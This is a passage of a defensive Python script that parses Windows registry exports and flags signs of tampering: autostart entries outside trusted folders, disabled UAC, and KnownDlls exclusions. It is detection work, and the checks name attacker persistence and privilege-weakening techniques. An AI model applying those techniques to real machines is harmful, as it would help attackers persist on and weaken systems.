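SESSION_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager"
# Directories a Run entry is normally expected to point into (assumption)
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def _decode_value(raw):
    """Turn a .reg value literal into str, int, list (REG_MULTI_SZ) or bytes."""
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    if raw.startswith("dword:"):
        return int(raw[6:], 16)
    m = re.match(r"hex(?:\((\d+)\))?:(.*)$", raw)
    if m:
        data = bytes(int(b, 16) for b in m.group(2).split(",") if b.strip())
        if m.group(1) == "7":  # REG_MULTI_SZ: UTF-16LE, NUL-separated, double-NUL terminated
            return [s for s in data.decode("utf-16-le").split("\x00") if s]
        return data
    return raw


def parse_reg(text):
    """Parse .reg text into {key: {value_name: value}}, joining '\\'-continued lines."""
    logical = re.sub(r"\\\r?\n\s*", "", text)  # reg export wraps long hex data
    keys, current = {}, None
    for line in logical.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"'):
            name, _, raw = line.partition("=")
            keys[current][name.strip('"')] = _decode_value(raw)
    return keys


def audit_registry(keys):
    """Return (key, value name, reason) findings for the three checks."""
    findings = []
    for name, cmd in keys.get(RUN_KEY, {}).items():
        if isinstance(cmd, str) and not cmd.lower().lstrip('"').startswith(TRUSTED_DIRS):
            findings.append((RUN_KEY, name, f"autostart outside trusted directories: {cmd}"))
    if keys.get(POLICY_KEY, {}).get("EnableLUA") == 0:
        findings.append((POLICY_KEY, "EnableLUA", "UAC disabled (EnableLUA=0)"))
    excluded = keys.get(SESSION_KEY, {}).get("ExcludeFromKnownDlls")
    if excluded:
        hits = sorted({d.lower() for d in excluded} & SUSPECT_KNOWNDLLS)
        reason = (f"KnownDlls exclusion present; suspect entries: {hits}" if hits
                  else "KnownDlls exclusion present")
        findings.append((SESSION_KEY, "ExcludeFromKnownDlls", reason))
    return findings


if __name__ == "__main__":
    # Real use: parse_reg(open("export.reg", encoding="utf-16").read())
    for key, value, reason in audit_registry(parse_reg(SAMPLE_REG)):
        print(f"{key}\\{value}: {reason}")
```

Files written by `reg export` on a real machine are UTF-16 encoded, so they must be opened with that encoding before being handed to the parser; the constructed sample is plain text only so the example runs inline.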


Source: www.cnblogs.com/mutudou/p/11842120.html